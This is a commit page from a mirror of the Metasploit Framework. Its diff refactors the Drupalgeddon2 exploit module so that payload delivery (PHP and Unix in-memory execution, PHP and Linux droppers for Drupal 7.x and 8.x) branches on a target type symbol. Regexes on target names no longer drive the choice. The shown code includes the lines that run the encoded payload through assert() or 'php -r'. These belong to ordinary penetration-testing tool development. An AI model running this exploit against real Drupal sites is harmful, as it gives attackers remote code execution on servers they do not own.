infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Set target type instead of regexing names 

We're no longer matching multiple targets like /In-Memory/ or /Dropper/,
so it makes sense to match on a specific value now.

Old matching in this commit: 1900aa2708.
GSoC/Meterpreter_Web_Console
William Vu 2018-04-25 11:53:26 -05:00
parent 675ed78948
commit b8eb7f2a86
1 changed files with 28 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

44
modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
View File

@ -53,19 +53,23 @@ class MetasploitModule < Msf::Exploit::Remote
#
['Automatic (PHP In-Memory)',
'Platform' => 'php',
'Arch' => ARCH_PHP
'Arch' => ARCH_PHP,
'Type' => :php_memory
],
['Automatic (PHP Dropper)',
'Platform' => 'php',
'Arch' => ARCH_PHP
'Arch' => ARCH_PHP,
'Type' => :php_dropper
],
['Automatic (Unix In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD
'Arch' => ARCH_CMD,
'Type' => :unix_memory
],
['Automatic (Linux Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64]
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper
],
#
# Drupal 7.x targets (PHP, cmd/unix, native)
@ -73,22 +77,26 @@ class MetasploitModule < Msf::Exploit::Remote
['Drupal 7.x (PHP In-Memory)',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Version' => Gem::Version.new('7.x')
'Version' => Gem::Version.new('7.x'),
'Type' => :php_memory
],
['Drupal 7.x (PHP Dropper)',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Version' => Gem::Version.new('7.x')
'Version' => Gem::Version.new('7.x'),
'Type' => :php_dropper
],
['Drupal 7.x (Unix In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Version' => Gem::Version.new('7.x')
'Version' => Gem::Version.new('7.x'),
'Type' => :unix_memory
],
['Drupal 7.x (Linux Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Version' => Gem::Version.new('7.x')
'Version' => Gem::Version.new('7.x'),
'Type' => :linux_dropper
],
#
# Drupal 8.x targets (PHP, cmd/unix, native)
@ -96,22 +104,26 @@ class MetasploitModule < Msf::Exploit::Remote
['Drupal 8.x (PHP In-Memory)',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Version' => Gem::Version.new('8.x')
'Version' => Gem::Version.new('8.x'),
'Type' => :php_memory
],
['Drupal 8.x (PHP Dropper)',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Version' => Gem::Version.new('8.x')
'Version' => Gem::Version.new('8.x'),
'Type' => :php_dropper
],
['Drupal 8.x (Unix In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Version' => Gem::Version.new('8.x')
'Version' => Gem::Version.new('8.x'),
'Type' => :unix_memory
],
['Drupal 8.x (Linux Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Version' => Gem::Version.new('8.x')
'Version' => Gem::Version.new('8.x'),
'Type' => :linux_dropper
]
],
'DefaultTarget' => 0, # Automatic (PHP In-Memory)
@ -168,8 +180,8 @@ class MetasploitModule < Msf::Exploit::Remote
end
# NOTE: assert() is attempted first, then PHP_FUNC if that fails
case target.name
when /PHP In-Memory/
case target['Type']
when :php_memory
execute_command(payload.encoded, func: 'assert')
sleep(wfs_delay)
@ -177,9 +189,9 @@ class MetasploitModule < Msf::Exploit::Remote
# XXX: This will spawn a *very* obvious process
execute_command("php -r '#{payload.encoded}'")
when /Unix In-Memory/
when :unix_memory
execute_command(payload.encoded)
when /PHP Dropper/, /Linux Dropper/
when :php_dropper, :linux_dropper
dropper_assert
sleep(wfs_delay)